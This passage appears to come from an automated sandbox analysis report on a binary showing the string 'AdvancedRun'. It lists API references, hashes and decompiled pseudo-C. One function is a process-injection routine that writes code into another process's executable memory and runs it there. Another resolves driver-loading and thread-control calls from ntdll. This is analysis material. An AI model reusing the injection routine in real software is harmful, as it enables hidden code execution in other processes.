                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                  • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                  • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                  • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                                				_t13 = _t8;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					FreeLibrary(_v8);
                                                                                                                				}
                                                                                                                				return _t13;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t6;
                                                                                                                				void* _t8;
                                                                                                                				struct HINSTANCE__** _t10;
                                                                                                                
                                                                                                                				_t10 = __eax;
                                                                                                                				E00409921(__eax);
                                                                                                                				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                                				if(_t6 == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                				return _t8;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t3;
                                                                                                                				signed int* _t7;
                                                                                                                
                                                                                                                				_t7 = __edi;
                                                                                                                				_t3 =  *__edi;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					FreeLibrary(_t3); // executed
                                                                                                                					 *__edi =  *__edi & 0x00000000;
                                                                                                                				}
                                                                                                                				E004099D4( &(_t7[0xa]));
                                                                                                                				return E004099D4( &(_t7[6]));
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                
                                                                                                                				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                                				return 1;
                                                                                                                			}



                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                                				char _v8;
                                                                                                                				long _v12;
                                                                                                                				long _v16;
                                                                                                                				long _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				long _v28;
                                                                                                                				char _v564;
                                                                                                                				char _v16950;
                                                                                                                				char _v33336;
                                                                                                                				_Unknown_base(*)()* _v33348;
                                                                                                                				_Unknown_base(*)()* _v33352;
                                                                                                                				void _v33420;
                                                                                                                				void _v33432;
                                                                                                                				void _v33436;
                                                                                                                				intOrPtr _v66756;
                                                                                                                				intOrPtr _v66760;
                                                                                                                				void _v66848;
                                                                                                                				void _v66852;
                                                                                                                				void* __edi;
                                                                                                                				void* _t76;
                                                                                                                				_Unknown_base(*)()* _t84;
                                                                                                                				_Unknown_base(*)()* _t87;
                                                                                                                				void* _t90;
                                                                                                                				signed int _t126;
                                                                                                                				struct HINSTANCE__* _t128;
                                                                                                                				intOrPtr* _t138;
                                                                                                                				void* _t140;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				void* _t148;
                                                                                                                
                                                                                                                				E0040B550(0x10524, __ecx);
                                                                                                                				_t138 = _a4;
                                                                                                                				_v12 = 0;
                                                                                                                				 *_t138 = 0;
                                                                                                                				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                                				_a8 = _t76;
                                                                                                                				if(_t76 == 0) {
                                                                                                                					 *_t138 = GetLastError();
                                                                                                                					L30:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                				_v33436 = 0;
                                                                                                                				memset( &_v33432, 0, 0x8284);
                                                                                                                				_t148 = _t147 + 0xc;
                                                                                                                				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_v8 = 0;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("CreateProcessW");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t84 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t84 = _v8();
                                                                                                                				}
                                                                                                                				_v33352 = _t84;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("GetLastError");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t87 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t87 = _v8();
                                                                                                                				}
                                                                                                                				_t140 = _a28;
                                                                                                                				_v33348 = _t87;
                                                                                                                				if(_t140 != 0) {
                                                                                                                					_t126 = 0x11;
                                                                                                                					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                                					_t148 = _t148 + 0xc;
                                                                                                                				}
                                                                                                                				_v33420 = 0x44;
                                                                                                                				if(_a16 == 0) {
                                                                                                                					_v33336 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v33336, _a16);
                                                                                                                				}
                                                                                                                				if(_a12 == 0) {
                                                                                                                					_v16950 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v16950, _a12);
                                                                                                                				}
                                                                                                                				if(_a24 == 0) {
                                                                                                                					_v564 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x104,  &_v564, _a24);
                                                                                                                				}
                                                                                                                				_v24 = _a20;
                                                                                                                				_v28 = 0;
                                                                                                                				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                                				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                                				_a12 = _t90;
                                                                                                                				if(_a16 == 0 || _t90 == 0) {
                                                                                                                					 *_a4 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                                                					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                                                					_v20 = 0;
                                                                                                                					_v16 = 0;
                                                                                                                					_a24 = 0;
                                                                                                                					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                                                					_a28 = _t144;
                                                                                                                					if(_t144 == 0) {
                                                                                                                						 *_a4 = GetLastError();
                                                                                                                					} else {
                                                                                                                						ResumeThread(_t144);
                                                                                                                						WaitForSingleObject(_t144, 0x7d0);
                                                                                                                						CloseHandle(_t144);
                                                                                                                					}
                                                                                                                					_v66852 = 0;
                                                                                                                					memset( &_v66848, 0, 0x8284);
                                                                                                                					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                                                					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                                                					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                                                					if(_a28 != 0) {
                                                                                                                						 *_a4 = _v66756;
                                                                                                                						_v12 = _v66760;
                                                                                                                						if(_a32 != 0) {
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_v20 != 0) {
                                                                                                                						FreeLibrary(_v20);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L30;
                                                                                                                			}


































                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                				struct tagPOINT _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t47;
                                                                                                                				struct HBRUSH__* _t56;
                                                                                                                				void* _t61;
                                                                                                                				unsigned int _t63;
                                                                                                                				void* _t68;
                                                                                                                				struct HWND__* _t69;
                                                                                                                				struct HWND__* _t70;
                                                                                                                				void* _t73;
                                                                                                                				unsigned int _t74;
                                                                                                                				struct HWND__* _t76;
                                                                                                                				struct HWND__* _t77;
                                                                                                                				struct HWND__* _t78;
                                                                                                                				struct HWND__* _t79;
                                                                                                                				unsigned int _t85;
                                                                                                                				struct HWND__* _t87;
                                                                                                                				struct HWND__* _t89;
                                                                                                                				struct HWND__* _t90;
                                                                                                                				struct tagPOINT _t96;
                                                                                                                				struct tagPOINT _t98;
                                                                                                                				signed short _t103;
                                                                                                                				void* _t106;
                                                                                                                				void* _t117;
                                                                                                                
                                                                                                                				_t106 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t47 = _a4 - 0x110;
                                                                                                                				_t117 = __ecx;
                                                                                                                				if(_t47 == 0) {
                                                                                                                					__eflags =  *0x40feb0;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                                					} else {
                                                                                                                						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                					}
                                                                                                                					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                					E0040103E(_t117, __eflags);
                                                                                                                					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                                					goto L30;
                                                                                                                				} else {
                                                                                                                					_t61 = _t47 - 1;
                                                                                                                					if(_t61 == 0) {
                                                                                                                						_t103 = _a8;
                                                                                                                						_t63 = _t103 >> 0x10;
                                                                                                                						__eflags = _t103 - 1;
                                                                                                                						if(_t103 == 1) {
                                                                                                                							L24:
                                                                                                                							__eflags = _t63;
                                                                                                                							if(_t63 != 0) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                								DeleteObject( *(_t117 + 0x43c));
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags = _t103 - 2;
                                                                                                                							if(_t103 != 2) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								goto L24;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t68 = _t61 - 0x27;
                                                                                                                						if(_t68 == 0) {
                                                                                                                							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                							__eflags = _a12 - _t69;
                                                                                                                							if(_a12 != _t69) {
                                                                                                                								__eflags =  *0x40ff30;
                                                                                                                								if( *0x40ff30 == 0) {
                                                                                                                									goto L30;
                                                                                                                								} else {
                                                                                                                									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                									__eflags = _a12 - _t70;
                                                                                                                									if(_a12 != _t70) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								L18:
                                                                                                                								SetBkMode(_a8, 1);
                                                                                                                								SetTextColor(_a8, 0xc00000);
                                                                                                                								_t56 = GetSysColorBrush(0xf);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t73 = _t68 - 0xc8;
                                                                                                                							if(_t73 == 0) {
                                                                                                                								_t74 = _a12;
                                                                                                                								_t96 = _t74 & 0x0000ffff;
                                                                                                                								_v12.x = _t96;
                                                                                                                								_v12.y = _t74 >> 0x10;
                                                                                                                								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                								_push(_v12.y);
                                                                                                                								_a8 = _t76;
                                                                                                                								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                								__eflags = _t77 - _a8;
                                                                                                                								if(_t77 != _a8) {
                                                                                                                									__eflags =  *0x40ff30;
                                                                                                                									if( *0x40ff30 == 0) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                										_push(_v12.y);
                                                                                                                										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                										__eflags = _t79 - _t78;
                                                                                                                										if(_t79 != _t78) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											goto L13;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									L13:
                                                                                                                									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t73 != 0) {
                                                                                                                									L30:
                                                                                                                									_t56 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                								} else {
                                                                                                                									_t85 = _a12;
                                                                                                                									_t98 = _t85 & 0x0000ffff;
                                                                                                                									_v12.x = _t98;
                                                                                                                									_v12.y = _t85 >> 0x10;
                                                                                                                									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                									_push(_v12.y);
                                                                                                                									_a8 = _t87;
                                                                                                                									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                										__eflags =  *0x40ff30;
                                                                                                                										if( *0x40ff30 == 0) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                											_push(_v12.y);
                                                                                                                											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                											__eflags = _t90 - _t89;
                                                                                                                											if(_t90 != _t89) {
                                                                                                                												goto L30;
                                                                                                                											} else {
                                                                                                                												_push(0x40ff30);
                                                                                                                												goto L7;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_push(_t117 + 0x23e);
                                                                                                                										L7:
                                                                                                                										_push( *(_t117 + 0x10));
                                                                                                                										E00404F7E();
                                                                                                                										L8:
                                                                                                                										_t56 = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t56;
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
                                                                                                                				void* _t1;
                                                                                                                				struct HINSTANCE__* _t2;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *0x41c4ac == 0) {
                                                                                                                					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                					 *0x41c4ac = _t2;
                                                                                                                					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                                					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                                					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                                					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                                					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                                					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                                					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                                					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                                					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                                					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                                					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                                					 *0x41c4a8 = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
